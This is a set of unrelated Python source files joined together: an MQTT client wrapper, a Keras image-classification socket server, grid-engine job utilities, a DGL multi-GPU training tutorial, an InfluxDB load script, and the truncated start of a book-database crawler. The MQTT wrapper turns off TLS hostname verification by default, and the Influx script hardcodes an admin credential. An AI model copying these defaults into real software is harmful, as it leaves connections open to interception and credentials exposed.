communication.py
|
import logging
import time
import json
import threading
from collections import namedtuple
import paho.mqtt.client as mqtt
class Communication:
def __init__(self, config):
self._logger = logging.getLogger(self.__class__.__name__)
self._config = config
self.client = mqtt.Client()
self.client.on_message = self._on_message_cb
self.client.on_connect = self._on_connect_cb
self._subscriptions = set()
self._will = None
self._thread = None
self._lock = threading.Lock()
if self._config.getboolean("ssl"):
self.client.tls_set(self._config["ca_certs"], self._config["certfile"], self._config["keyfile"])
if self._config.getboolean("unsafe_hostname", True):
self.client.tls_insecure_set(True)
if self._config.get("username"):
self.client.username_pw_set(self._config["username"], password=self._config.get("password", None))
def connect_async(self):
with self._lock:
if not self._thread:
self._thread = threading.Thread(target=self._connect)
self._thread.daemon = True
self._thread.start()
def _connect(self):
self.client.connect(host=self._config["hostname"], port=self._config.getint("port"))
while True:
try:
self.client.loop_forever()
except Exception as e:
self._logger.error("MQTT connection broken, reconnecting")
self._logger.error(e)
def _on_message_cb(self, client, userdata, msg):
# dispatch to every callback whose subscription matches the incoming topic
for topic, func in self._subscriptions:
if self.is_subscription(topic, msg.topic):
func(client, userdata, msg)
def _on_connect_cb(self, client, userdata, flags, rc):
# resubscribe to all topics when reconnecting
for topic, func in self._subscriptions:
self.client.subscribe(topic)
# set last will
if self.will:
self.client.will_set(*self.will)
def publish(self, topic, message, qos=0, retain=False):
"""
Publish a message to the topic.
:param str topic:
:param message: dict-like object or string, must be json serializable
:param int qos: quality of service for message
:param bool retain: retain messages on broker
"""
self._logger.debug("Publishing topic: %s message: %s qos: %s retain: %s", topic, message, qos, retain)
try:
# received a dict-like object
message["timestamp"] = time.time()
except TypeError:
# we got a string or something
message = {"message": message, "timestamp": time.time()}
self._logger.debug("Message formatted to %s", message)
self.client.publish(topic=topic, payload=json.dumps(message), qos=qos, retain=retain)
def register_callback(self, topic, callback):
cb_tuple = (topic, callback)
if cb_tuple not in self._subscriptions:
self._subscriptions.add(cb_tuple)
self.client.subscribe(topic)
@property
def will(self):
return self._will
@will.setter
def will(self, value):
"""
Set value as our will
:param value: Tuple[str, str, int, bool] where [topic, payload, qos, retain]
"""
self._will = value
self.client.will_set(*value)
@staticmethod
def is_subscription(sub, msg):
sub = sub.split("/")
msg = msg.split("/")
# a subscription with more levels than the message topic can never match
if len(sub) > len(msg):
return False
for i, part in enumerate(msg):
# the subscription ran out of levels before the topic did (and had no "#")
if i >= len(sub):
return False
# multi-level wildcard matches everything from here on
if sub[i] == "#":
return True
# single-level wildcard or exact match
elif sub[i] == "+" or sub[i] == part:
continue
else:
return False
return True
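# --- Usage sketch (not part of the original module) ---
# A minimal example of how this class might be wired up, assuming an ini file
# with a [broker] section that defines the keys read above (hostname, port,
# ssl, username, ...). The file name, topics and values are placeholders.
#
#   import configparser
#   cfg = configparser.ConfigParser()
#   cfg.read("mqtt.ini")
#   comm = Communication(cfg["broker"])
#   comm.register_callback("sensors/+/temperature",
#                          lambda client, userdata, msg: print(msg.topic, msg.payload))
#   comm.connect_async()
#   comm.publish("sensors/livingroom/temperature", {"value": 21.5})
#
# Topic matching follows MQTT wildcard rules, e.g.:
#   Communication.is_subscription("sensors/#", "sensors/livingroom/temperature")  # True
#   Communication.is_subscription("sensors/+", "sensors/livingroom/temperature")  # False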
|
server.py
|
#!/usr/bin/env python
import socket
from threading import Thread
import numpy as np
import os
import argparse
import config
import util
from sklearn.externals import joblib
import traceback
from keras.applications.imagenet_utils import preprocess_input
import time
util.set_img_format()
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, required=True, help='Base model architecture',
choices=[config.MODEL_RESNET50,
config.MODEL_RESNET152,
config.MODEL_INCEPTION_V3,
config.MODEL_VGG16])
args = parser.parse_args()
config.model = args.model
model_module = util.get_model_class_instance()
model = model_module.load()
print('Model loaded')
print('Warming up the model')
start = time.perf_counter()
if util.get_keras_backend_name() != 'tensorflow':
input_shape = (1, 3,) + model_module.img_size
else:
input_shape = (1, ) + model_module.img_size + (3, )
dummy_img = np.ones(input_shape)
dummy_img = preprocess_input(dummy_img)
model.predict(dummy_img)
end = time.perf_counter()
print('Warming up took {} s'.format(end - start))
print('Trying to load a Novelty Detector')
try:
af = util.get_activation_function(model, model_module.noveltyDetectionLayerName)
print('Activation function is loaded')
novelty_detection_clf = joblib.load(config.get_novelty_detection_model_path())
print('Novelty Detection classifier is loaded')
except Exception as e:
print('Error on loading Novelty Detection classifier', e)
FILE_DOES_NOT_EXIST = '-1'
UNKNOWN_ERROR = '-2'
def handle(clientsocket):
while 1:
buf = clientsocket.recv(config.buffer_size)
if buf == 'exit'.encode():
return # client terminated connection
response = ''
if os.path.isfile(buf):
try:
img = [model_module.load_img(buf)]
out = model.predict(np.array(img))
prediction = np.argmax(out)
top10 = out[0].argsort()[-10:][::-1]
class_indices = dict(zip(config.classes, range(len(config.classes))))
keys = list(class_indices.keys())
values = list(class_indices.values())
answer = keys[values.index(prediction)]
try:
acts = util.get_activations(af, img)
predicted_relativity = novelty_detection_clf.predict(acts)[0]
nd_class = novelty_detection_clf.__classes[predicted_relativity]
except Exception as e:
print(e)
nd_class = 'related'
top10_json = "["
for i, t in enumerate(top10):
top10_json += '{"probability":"%s", "class":"%s"}%s' % (
out[0][t], keys[values.index(t)], '' if i == 9 else ',')
top10_json += "]"
response = '{"probability":"%s","class":"%s","relativity":"%s","top10":%s}' % (
out[0][prediction], answer, nd_class, top10_json)
print(response)
except Exception as e:
print('Error', e)
traceback.print_stack()
response = UNKNOWN_ERROR
else:
response = FILE_DOES_NOT_EXIST
clientsocket.sendall(response.encode())
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(config.server_address)
serversocket.listen(10000)
print('Ready for requests')
while 1:
# accept connections from outside
(clientsocket, address) = serversocket.accept()
ct = Thread(target=handle, args=(clientsocket,))
ct.start()  # start() runs each handler in its own thread; run() would block the accept loop
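# --- Client sketch (not part of the original script) ---
# A minimal example of how a client could talk to this server, assuming
# config.server_address is a reachable (host, port) tuple and config.buffer_size
# matches the server's. The image path is a placeholder.
#
#   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   s.connect(config.server_address)
#   s.sendall('/path/to/image.jpg'.encode())
#   print(s.recv(config.buffer_size).decode())  # JSON with class/probability/relativity/top10
#   s.sendall('exit'.encode())                  # tells the handler to return
#   s.close()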
|
grid.py
|
"""
Code to submit multiple jobs to the JCVI grid engine
"""
import os.path as op
import sys
import re
import logging
from multiprocessing import Pool, Process, Queue, cpu_count
from jcvi.formats.base import write_file, must_open
from jcvi.apps.base import OptionParser, ActionDispatcher, popen, backup, \
mkdir, sh, listify
class Parallel(object):
"""
Run a number of commands in parallel.
"""
def __init__(self, cmds, cpus=cpu_count()):
self.cmds = cmds
self.cpus = min(len(cmds), cpus)
def run(self):
p = Pool(processes=self.cpus)
p.map(sh, self.cmds)
class Dependency (object):
"""
Used by MakeManager.
"""
def __init__(self, source, target, cmds, id, remove=False):
self.id = id
self.source = listify(source)
self.target = listify(target)
self.cmds = listify(cmds)
if remove:
rm_cmd = "rm -f {0}".format(" ".join(self.target))
self.cmds = [rm_cmd] + self.cmds
def __str__(self):
source = " ".join(self.source)
target = " ".join(self.target)
# When there are multiple targets, use .INTERMEDIATE
# <http://stackoverflow.com/questions/2973445/gnu-makefile-rule-generating-a-few-targets-from-a-single-source-file>
if len(self.target) > 1:
intermediate = "{0}.intermediate".format(self.id)
s = "{0} : {1}\n".format(target, intermediate)
s += ".INTERMEDIATE: {0}\n".format(intermediate)
s += "{0} : {1}\n".format(intermediate, source)
else:
s = "{0} : {1}\n".format(target, source)
for c in self.cmds:
c = c.replace("$", "$$") # Command escaping
s += "\t" + c + "\n"
return s
class MakeManager (list):
"""
Write and execute makefile.
"""
def __init__(self, filename="makefile"):
self.makefile = filename
self.targets = set()
self.ndeps = 0
def add(self, source, target, cmds, remove=False):
self.ndeps += 1
d = Dependency(source, target, cmds, self.ndeps, remove=remove)
self.append(d)
self.targets |= set(listify(target))
def write(self):
assert self.targets, "No targets specified"
filename = self.makefile
if op.exists(filename):
backup(filename)
fw = open(filename, "w")
print >> fw, "all : {0}\n".format(" ".join(sorted(self.targets)))
for d in self:
print >> fw, d
print >> fw, "clean :\n\trm -rf {0}\n".format(" ".join(self.targets))
fw.close()
logging.debug("Makefile written to `{0}`.".format(self.makefile))
def run(self, cpus=1):
if not op.exists(self.makefile):
self.write()
cmd = "make -j {0} -f {1}".format(cpus, self.makefile)
sh(cmd)
def clean(self):
cmd = "make clean -f {}".format(self.makefile)
sh(cmd)
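# --- Usage sketch (not part of the original module) ---
# How MakeManager might be used; the file names and command are placeholders.
#
#   mm = MakeManager()
#   mm.add("input.fasta", "input.fasta.fai", "samtools faidx input.fasta")
#   mm.write()      # writes `makefile` with an `all` and a `clean` target
#   mm.run(cpus=4)  # equivalent to `make -j 4 -f makefile`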
class Jobs (list):
"""
Run multiple function calls on the SAME computer, using multiprocessing.
"""
def __init__(self, target, args):
for x in args:
x = listify(x)
self.append(Process(target=target, args=x))
def start(self):
for pi in self:
pi.start()
def join(self):
for pi in self:
pi.join()
def run(self):
self.start()
self.join()
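# --- Usage sketch (not part of the original module) ---
# Jobs takes a target callable and a list of argument tuples, one per process;
# process_sample and the file names are placeholders.
#
#   Jobs(target=process_sample, args=[("a.bam",), ("b.bam",), ("c.bam",)]).run()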
class Poison:
pass
class WriteJobs (object):
"""
Run multiple function calls, but write all results to the same file.
Producer-consumer model.
"""
def __init__(self, target, args, filename, cpus=cpu_count()):
workerq = Queue()
writerq = Queue()
for a in args:
workerq.put(a)
cpus = min(cpus, len(args))
for i in xrange(cpus):
workerq.put(Poison())
self.worker = Jobs(work, args=[(workerq, writerq, target)] * cpus)
self.writer = Process(target=write, args=(workerq, writerq, \
filename, cpus))
def run(self):
self.worker.start()
self.writer.start()
self.worker.join()
self.writer.join()
def work(queue_in, queue_out, target):
while True:
a = queue_in.get()
if isinstance(a, Poison):
break
res = target(a)
queue_out.put(res)
queue_out.put(Poison())
def write(queue_in, queue_out, filename, cpus):
from jcvi.utils.progressbar import ProgressBar, Percentage, Bar, ETA
fw = must_open(filename, "w")
isize = queue_in.qsize()
logging.debug("A total of {0} items to compute.".format(isize))
isize = isize or 1
widgets = ['Queue: ', Percentage(), ' ',
Bar(marker='>', left='[', right=']'), ' ', ETA()]
p = ProgressBar(maxval=isize, term_width=60, widgets=widgets).start()
poisons = 0
while True:
res = queue_out.get()
qsize = queue_in.qsize()
p.update(isize - qsize)
if isinstance(res, Poison):
poisons += 1
if poisons == cpus: # wait all workers finish
break
elif res:
print >> fw, res
fw.flush()
fw.close()
class GridOpts (dict):
def __init__(self, opts):
export = ("pcode", "queue", "threaded", "concurrency",
"outdir", "name", "hold_jid")
for e in export:
if e in opts.__dict__:
self[e] = getattr(opts, e)
class GridProcess (object):
pat1 = re.compile(r"Your job (?P<id>[0-9]*) ")
pat2 = re.compile(r"Your job-array (?P<id>\S*) ")
def __init__(self, cmd, jobid="", pcode="99999", queue="default", threaded=None,
infile=None, outfile=None, errfile=None, arr=None,
concurrency=None, outdir=".", name=None, hold_jid=None,
grid_opts=None):
self.cmd = cmd
self.jobid = jobid
self.queue = queue
self.threaded = threaded
self.infile = infile
self.outfile = outfile or ""
self.errfile = errfile or ""
self.arr = arr
self.concurrency = concurrency
self.outdir = outdir
self.name = name
self.pcode = pcode
self.hold_jid = hold_jid
self.pat = self.pat2 if arr else self.pat1
if grid_opts:
self.__dict__.update(GridOpts(grid_opts))
def __str__(self):
return "\t".join((x for x in \
(self.jobid, self.cmd, self.outfile) if x))
def build(self):
# Shell commands
if "|" in self.cmd or "&&" in self.cmd or "||" in self.cmd:
quote = "\"" if "'" in self.cmd else "'"
self.cmd = "sh -c {1}{0}{1}".format(self.cmd, quote)
# qsub command (the project code is specific to jcvi)
qsub = "qsub -P {0} -cwd".format(self.pcode)
if self.queue != "default":
qsub += " -l {0}".format(self.queue)
if self.threaded:
qsub += " -pe threaded {0}".format(self.threaded)
if self.arr:
assert 1 <= self.arr < 100000
qsub += " -t 1-{0}".format(self.arr)
if self.concurrency:
qsub += " -tc {0}".format(self.concurrency)
if self.name:
qsub += ' -N "{0}"'.format(self.name)
if self.hold_jid:
param = "-hold_jid_ad" if self.arr else "-hold_jid"
qsub += " {0} {1}".format(param, self.hold_jid)
# I/O
infile = self.infile
outfile = self.outfile
errfile = self.errfile
outdir = self.outdir
mkdir(outdir)
redirect_same = outfile and (outfile == errfile)
if infile:
qsub += " -i {0}".format(infile)
if outfile:
self.outfile = op.join(outdir, outfile)
qsub += " -o {0}".format(self.outfile)
if errfile:
if redirect_same:
qsub += " -j y"
else:
self.errfile = op.join(outdir, errfile)
qsub += " -e {0}".format(self.errfile)
cmd = " ".join((qsub, self.cmd))
return cmd
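# Example of a command this method can build (all values are illustrative):
#   qsub -P 99999 -cwd -pe threaded 4 -N "myjob" -o ./myjob.out -e ./myjob.err my_script.sh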
def start(self):
cmd = self.build()
# run the command and get the job-ID (important)
output = popen(cmd, debug=False).read()
if output.strip() != "":
self.jobid = re.search(self.pat, output).group("id")
else:
self.jobid = "-1"
msg = "[{0}] {1}".format(self.jobid, self.cmd)
if self.infile:
msg += " < {0} ".format(self.infile)
if self.outfile:
backup(self.outfile)
msg += " > {0} ".format(self.outfile)
if self.errfile:
backup(self.errfile)
msg += " 2> {0} ".format(self.errfile)
logging.debug(msg)
class Grid (list):
def __init__(self, cmds, outfiles=[]):
assert cmds, "Commands empty!"
if not outfiles:
outfiles = [None] * len(cmds)
for cmd, outfile in zip(cmds, outfiles):
self.append(GridProcess(cmd, outfile=outfile))
def run(self):
for pi in self:
pi.start()
PBS_STANZA = """
#PBS -q standard
#PBS -J 1-{0}
#PBS -l select=1:ncpus={1}:mem=23gb
#PBS -l pvmem=23gb
#PBS -l walltime=100:00:00
#PBS -W group_list=genomeanalytics
"""
arraysh = """
CMD=`awk "NR==$SGE_TASK_ID" {0}`
$CMD"""
arraysh_ua = PBS_STANZA + """
cd $PBS_O_WORKDIR
CMD=`awk "NR==$PBS_ARRAY_INDEX" {2}`
$CMD"""
def get_grid_engine():
cmd = "qsub --version"
ret = popen(cmd, debug=False).read()
return "PBS" if "PBS" in ret else "SGE"
def main():
actions = (
('run', 'run a normal command on grid'),
('array', 'run an array job'),
('kill', 'wrapper around the `qdel` command'),
)
p = ActionDispatcher(actions)
p.dispatch(globals())
def array(args):
"""
%prog array commands.list
Parallelize a set of commands on grid using array jobs.
"""
p = OptionParser(array.__doc__)
p.set_grid_opts(array=True)
opts, args = p.parse_args(args)
if len(args) != 1:
sys.exit(not p.print_help())
cmds, = args
fp = open(cmds)
N = sum(1 for x in fp)
fp.close()
pf = cmds.rsplit(".", 1)[0]
runfile = pf + ".sh"
assert runfile != cmds, \
"Commands list file should not have a `.sh` extension"
engine = get_grid_engine()
threaded = opts.threaded or 1
contents = arraysh.format(cmds) if engine == "SGE" \
else arraysh_ua.format(N, threaded, cmds)
write_file(runfile, contents)
if engine == "PBS":
return
outfile = "{0}.{1}.out".format(pf, "\$TASK_ID")
errfile = "{0}.{1}.err".format(pf, "\$TASK_ID")
p = GridProcess("sh {0}".format(runfile), outfile=outfile, errfile=errfile,
arr=N, grid_opts=opts)
p.start()
def run(args):
"""
%prog run command ::: file1 file2
Parallelize a set of commands on grid. The syntax is modeled after GNU
parallel <http://www.gnu.org/s/parallel/man.html#options>
{} - input line
{.} - input line without extension
{_} - input line first part
{/} - basename of input line
{/.} - basename of input line without extension
{/_} - basename of input line first part
{#} - sequence number of job to run
::: - Use arguments from the command line as input source instead of stdin
(standard input).
If file name is `t/example.tar.gz`, then,
{} is "t/example.tar.gz", {.} is "t/example.tar", {_} is "t/example"
{/} is "example.tar.gz", {/.} is "example.tar", {/_} is "example"
A few examples:
ls -1 *.fastq | %prog run process {} {.}.pdf # use stdin
%prog run process {} {.}.pdf ::: *fastq # use :::
%prog run "zcat {} > {.}" ::: *.gz # quote redirection
%prog run < commands.list # run a list of commands
"""
p = OptionParser(run.__doc__)
p.set_grid_opts()
opts, args = p.parse_args(args)
if len(args) == 0:
sys.exit(not p.print_help())
sep = ":::"
if sep in args:
sepidx = args.index(sep)
filenames = args[sepidx + 1:]
args = args[:sepidx]
if not filenames:
filenames = [""]
else:
filenames = sys.stdin if not sys.stdin.isatty() else [""]
cmd = " ".join(args)
cmds = [] if filenames else [(cmd, None)]
for i, filename in enumerate(filenames):
filename = filename.strip()
noextname = filename.rsplit(".", 1)[0]
prefix, basename = op.split(filename)
basenoextname = basename.rsplit(".", 1)[0]
basefirstname = basename.split(".")[0]
firstname = op.join(prefix, basefirstname)
ncmd = cmd
if "{" in ncmd:
ncmd = ncmd.replace("{}", filename)
else:
ncmd += " " + filename
ncmd = ncmd.replace("{.}", noextname)
ncmd = ncmd.replace("{_}", firstname)
ncmd = ncmd.replace("{/}", basename)
ncmd = ncmd.replace("{/.}", basenoextname)
ncmd = ncmd.replace("{/_}", basefirstname)
ncmd = ncmd.replace("{#}", str(i))
outfile = None
if ">" in ncmd:
ncmd, outfile = ncmd.split(">", 1)
ncmd, outfile = ncmd.strip(), outfile.strip()
ncmd = ncmd.strip()
cmds.append((ncmd, outfile))
for ncmd, outfile in cmds:
p = GridProcess(ncmd, outfile=outfile, grid_opts=opts)
p.start()
def guess_method(tag):
from jcvi.formats.base import is_number
jobids = tag.split(",")
for jobid in jobids:
if not is_number(jobid):
return "pattern"
return "jobid"
def kill(args):
"""
%prog kill [options] JOBNAMEPAT/JOBIDs
Kill jobs based on JOBNAME pattern matching (case-sensitive)
or list of JOBIDs (comma separated)
Examples:
%prog kill "pyth*" # Use regex
%prog kill 160253,160245,160252 # Use list of job ids
%prog kill all # Everything
"""
import shlex
from jcvi.apps.base import sh, getusername
from subprocess import check_output, CalledProcessError
import xml.etree.ElementTree as ET
valid_methods = ("pattern", "jobid")
p = OptionParser(kill.__doc__)
p.add_option("--method", choices=valid_methods,
help="Identify jobs based on [default: guess]")
opts, args = p.parse_args(args)
if len(args) != 1:
sys.exit(not p.print_help())
username = getusername()
tag, = args
tag = tag.strip()
if tag == "all":
sh("qdel -u {0}".format(username))
return
valid_jobids = set()
method = opts.method or guess_method(tag)
if method == "jobid":
jobids = tag.split(",")
valid_jobids |= set(jobids)
elif method == "pattern":
qsxmlcmd = 'qstat -u "{0}" -j "{1}" -nenv -njd -xml'.\
format(username, tag)
try:
qsxml = check_output(shlex.split(qsxmlcmd)).strip()
except CalledProcessError, e:
qsxml = None
logging.debug('No jobs matching the pattern "{0}"'.format(tag))
if qsxml is not None:
for job in ET.fromstring(qsxml).findall("djob_info"):
for elem in job.findall("element"):
jobid = elem.find("JB_job_number").text
valid_jobids.add(jobid)
if valid_jobids:
sh("qdel {0}".format(",".join(valid_jobids)))
if __name__ == '__main__':
main()
|
2_node_classification.py
|
"""
Single Machine Multi-GPU Minibatch Node Classification
======================================================
In this tutorial, you will learn how to use multiple GPUs in training a
graph neural network (GNN) for node classification.
(Time estimate: 8 minutes)
This tutorial assumes that you have read the :doc:`Training GNN with Neighbor
Sampling for Node Classification <../large/L1_large_node_classification>`
tutorial. It also assumes that you know the basics of training general
models with multi-GPU with ``DistributedDataParallel``.
.. note::
See `this tutorial <https://pytorch.org/tutorials/intermediate/ddp_tutorial.html>`__
from PyTorch for general multi-GPU training with ``DistributedDataParallel``. Also,
see the first section of :doc:`the multi-GPU graph classification
tutorial <1_graph_classification>`
for an overview of using ``DistributedDataParallel`` with DGL.
"""
######################################################################
# Loading Dataset
# ---------------
#
# OGB already prepared the data as a ``DGLGraph`` object. The following code is
# copy-pasted from the :doc:`Training GNN with Neighbor Sampling for Node
# Classification <../large/L1_large_node_classification>`
# tutorial.
#
import dgl
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from dgl.nn import SAGEConv
from ogb.nodeproppred import DglNodePropPredDataset
import tqdm
import sklearn.metrics
dataset = DglNodePropPredDataset('ogbn-arxiv')
graph, node_labels = dataset[0]
# Add reverse edges since ogbn-arxiv is unidirectional.
graph = dgl.add_reverse_edges(graph)
graph.ndata['label'] = node_labels[:, 0]
node_features = graph.ndata['feat']
num_features = node_features.shape[1]
num_classes = (node_labels.max() + 1).item()
idx_split = dataset.get_idx_split()
train_nids = idx_split['train']
valid_nids = idx_split['valid']
test_nids = idx_split['test'] # Test node IDs, not used in the tutorial though.
######################################################################
# Defining Model
# --------------
#
# The model will be again identical to the :doc:`Training GNN with Neighbor
# Sampling for Node Classification <../large/L1_large_node_classification>`
# tutorial.
#
class Model(nn.Module):
def __init__(self, in_feats, h_feats, num_classes):
super(Model, self).__init__()
self.conv1 = SAGEConv(in_feats, h_feats, aggregator_type='mean')
self.conv2 = SAGEConv(h_feats, num_classes, aggregator_type='mean')
self.h_feats = h_feats
def forward(self, mfgs, x):
h_dst = x[:mfgs[0].num_dst_nodes()]
h = self.conv1(mfgs[0], (x, h_dst))
h = F.relu(h)
h_dst = h[:mfgs[1].num_dst_nodes()]
h = self.conv2(mfgs[1], (h, h_dst))
return h
######################################################################
# Defining Training Procedure
# ---------------------------
#
# The training procedure will be slightly different from what you saw
# previously, in the sense that you will need to
#
# * Initialize a distributed training context with ``torch.distributed``.
# * Wrap your model with ``torch.nn.parallel.DistributedDataParallel``.
# * Add a ``use_ddp=True`` argument to the DGL dataloader you wish to run
# together with DDP.
#
# You will also need to wrap the training loop inside a function so that
# you can spawn subprocesses to run it.
#
def run(proc_id, devices):
# Initialize distributed training context.
dev_id = devices[proc_id]
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(master_ip='127.0.0.1', master_port='12345')
if torch.cuda.device_count() < 1:
device = torch.device('cpu')
torch.distributed.init_process_group(
backend='gloo', init_method=dist_init_method, world_size=len(devices), rank=proc_id)
else:
torch.cuda.set_device(dev_id)
device = torch.device('cuda:' + str(dev_id))
torch.distributed.init_process_group(
backend='nccl', init_method=dist_init_method, world_size=len(devices), rank=proc_id)
# Define training and validation dataloader, copied from the previous tutorial
# but with one line of difference: use_ddp to enable distributed data parallel
# data loading.
sampler = dgl.dataloading.MultiLayerNeighborSampler([4, 4])
train_dataloader = dgl.dataloading.NodeDataLoader(
# The following arguments are specific to NodeDataLoader.
graph, # The graph
train_nids, # The node IDs to iterate over in minibatches
sampler, # The neighbor sampler
device=device, # Put the sampled MFGs on CPU or GPU
use_ddp=True, # Make it work with distributed data parallel
# The following arguments are inherited from PyTorch DataLoader.
batch_size=1024, # Per-device batch size.
# The effective batch size is this number times the number of GPUs.
shuffle=True, # Whether to shuffle the nodes for every epoch
drop_last=False, # Whether to drop the last incomplete batch
num_workers=0 # Number of sampler processes
)
valid_dataloader = dgl.dataloading.NodeDataLoader(
graph, valid_nids, sampler,
device=device,
use_ddp=False,
batch_size=1024,
shuffle=False,
drop_last=False,
num_workers=0,
)
model = Model(num_features, 128, num_classes).to(device)
# Wrap the model with distributed data parallel module.
if device == torch.device('cpu'):
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=None, output_device=None)
else:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[device], output_device=device)
# Define optimizer
opt = torch.optim.Adam(model.parameters())
best_accuracy = 0
best_model_path = './model.pt'
# Copied from previous tutorial with changes highlighted.
for epoch in range(10):
model.train()
with tqdm.tqdm(train_dataloader) as tq:
for step, (input_nodes, output_nodes, mfgs) in enumerate(tq):
# feature copy from CPU to GPU takes place here
inputs = mfgs[0].srcdata['feat']
labels = mfgs[-1].dstdata['label']
predictions = model(mfgs, inputs)
loss = F.cross_entropy(predictions, labels)
opt.zero_grad()
loss.backward()
opt.step()
accuracy = sklearn.metrics.accuracy_score(labels.cpu().numpy(), predictions.argmax(1).detach().cpu().numpy())
tq.set_postfix({'loss': '%.03f' % loss.item(), 'acc': '%.03f' % accuracy}, refresh=False)
model.eval()
# Evaluate on only the first GPU.
if proc_id == 0:
predictions = []
labels = []
with tqdm.tqdm(valid_dataloader) as tq, torch.no_grad():
for input_nodes, output_nodes, mfgs in tq:
inputs = mfgs[0].srcdata['feat']
labels.append(mfgs[-1].dstdata['label'].cpu().numpy())
predictions.append(model(mfgs, inputs).argmax(1).cpu().numpy())
predictions = np.concatenate(predictions)
labels = np.concatenate(labels)
accuracy = sklearn.metrics.accuracy_score(labels, predictions)
print('Epoch {} Validation Accuracy {}'.format(epoch, accuracy))
if best_accuracy < accuracy:
best_accuracy = accuracy
torch.save(model.state_dict(), best_model_path)
# Note that this tutorial does not train the whole model to the end.
break
######################################################################
# Spawning Trainer Processes
# --------------------------
#
# A typical scenario for multi-GPU training with DDP is to replicate the
# model once per GPU, and spawn one trainer process per GPU.
#
# PyTorch tutorials recommend using ``multiprocessing.spawn`` to spawn
# multiple processes. This however is undesirable for training node
# classification or link prediction models on a single large graph,
# especially on Linux. The reason is that a single large graph itself may
# take a lot of memory, and ``mp.spawn`` will duplicate all objects in the
# program, including the large graph. Consequently, the large graph will
# be duplicated as many times as the number of GPUs.
#
# To alleviate the problem we recommend using ``multiprocessing.Process``,
# which *forks* from the main process and allows sharing the same graph
# object to trainer processes via *copy-on-write*. This can greatly reduce
# the memory consumption.
#
# Normally, DGL maintains only one sparse matrix representation (usually COO)
# for each graph, and will create new formats when some APIs are called for
# efficiency. For instance, calling ``in_degrees`` will create a CSC
# representation for the graph, and calling ``out_degrees`` will create a
# CSR representation. A consequence is that if a graph is shared to
# trainer processes via copy-on-write *before* having its CSC/CSR
# created, each trainer will create its own CSC/CSR replica once ``in_degrees``
# or ``out_degrees`` is called. To avoid this, you need to create
# all sparse matrix representations beforehand using the ``create_formats_``
# method:
#
graph.create_formats_()
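# In recent DGL versions you can double-check the result with ``graph.formats()``,
# which reports that the 'coo', 'csr' and 'csc' formats have all been created.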
######################################################################
# Then you can spawn the subprocesses to train with multiple GPUs.
#
# .. note::
#
# You will need to use ``dgl.multiprocessing`` instead of the Python
# ``multiprocessing`` package. ``dgl.multiprocessing`` is identical to
# Python’s built-in ``multiprocessing`` except that it handles the
# subtleties between forking and multithreading in Python.
#
# Say you have four GPUs.
num_gpus = 4
import dgl.multiprocessing as mp
devices = list(range(num_gpus))
procs = []
for proc_id in range(num_gpus):
p = mp.Process(target=run, args=(proc_id, devices))
p.start()
procs.append(p)
for p in procs:
p.join()
# Thumbnail credits: Stanford CS224W Notes
# sphinx_gallery_thumbnail_path = '_static/blitz_1_introduction.png'
|
influx_query_load.py
|
import simplejson as json
import pycurl, sys, time, multiprocessing, threading
numProcesses = int(sys.argv[1])
numQueriesPerProcess = int(sys.argv[2])
series = sys.argv[3]
url = sys.argv[4]
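# Usage sketch (not part of the original script); host, database and series below are placeholders:
#   python influx_query_load.py <numProcesses> <numQueriesPerProcess> <series> <url>
#   e.g. python influx_query_load.py 4 100 cpu_load http://localhost:8086/db/test/series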
print numProcesses * numQueriesPerProcess
data = "q=select value from "
data += series
print data
def processWorker(numQueriesPerProcess):
inc = 0
while inc < numQueriesPerProcess:
c = pycurl.Curl()
c.setopt(pycurl.URL, url)
c.setopt(pycurl.NOSIGNAL, 1)
c.setopt(pycurl.HTTPHEADER, ['Accept: text/plain'])
c.setopt(pycurl.POSTFIELDS, data)
c.setopt(c.VERBOSE, True)
c.setopt(pycurl.USERPWD, 'rdd-admin:password')
c.perform()
response = c.getinfo(c.RESPONSE_CODE)
if response != 200:
print response, data
print inc
inc += 1
def processStart(numProcesses,numQueriesPerProcess):
if __name__ == '__main__':
jobs = []
for i in range(numProcesses):
p = multiprocessing.Process(target=processWorker, args=(numQueriesPerProcess,))
jobs.append(p)
p.start()
processStart(numProcesses,numQueriesPerProcess)
|
main.py
|
# A book record
import base64
import sqlite3
import threading
import time
from _md5 import md5
from queue import Queue
from random import random, randint
from urllib import parse
import pickle
import requests
from src.server import Server, req, json, config, Log
from langconv import Converter
from conf.baidu import BaiduAppId, BaiduKey
class DbBook(object):
def __init__(self):
self.id = "" # unique identifier
self.title = "" # title
self.title2 = "" # translated title
self.author = "" # author
self.chineseTeam = "" # Chinese translation team
self.description = "" # description
self.epsCount = 0 # number of episodes/chapters
self.pages = 0 # number of pages
self.finished = False # whether the book is finished
self.categories = "" # categories
self.tags = "" # tags
self.likesCount = 0 # number of likes
self.created_at = 0 # creation time
self.updated_at = 0 # last update time
self.path = "" # cover thumbnail path
self.fileServer = "" # cover thumbnail file server
self.originalName = "" # cover image name
self.totalLikes = 0 # total likes
self.totalViews = 0 # total views
class MainInfo(object):
def __init__(self):
self.url = "http://api.fanyi.baidu.com/api/trans/vip/translate"
self.appid = BaiduAppId
self.secretKey = BaiduKey
self.fromLang = 'jp'
self.toLang = "zh"
self._inQueue = Queue()
self._resultQueue = Queue()
self.checkPage = 2
self.categoryIndex = 0
self.count = 0
self.idToCateGoryBase = []
self.thread = threading.Thread(target=self.Run)
self.thread.daemon = True
self.conn = sqlite3.connect("data/book.db")
self.cur = self.conn.cursor()
self.cur.execute("select * from book")
self.books = {}
self._needUpIds = set()
self._updateIds = {}
for data in self.cur.fetchall():
info = DbBook()
info.id = data[0]
info.title = data[1]
info.title2 = data[2]
info.author = data[3]
info.chineseTeam = data[4]
info.description = data[5]
info.epsCount = data[6]
info.pages = data[7]
info.finished = data[8]
info.likesCount = data[9]
info.categories = data[10]
info.tags = data[11]
info.created_at = data[12]
info.updated_at = data[13]
info.path = data[14]
info.fileServer = data[15]
info.originalName = data[16]
info.totalLikes = data[17]
info.totalViews = data[18]
self.books[info.id] = info
def AddHistory(self, book):
assert isinstance(book, DbBook)
sql = "replace INTO book(id, title, title2, author, chineseTeam, description, epsCount, pages, finished, likesCount, categories, tags," \
"created_at, updated_at, path, fileServer, originalName, totalLikes, totalViews) " \
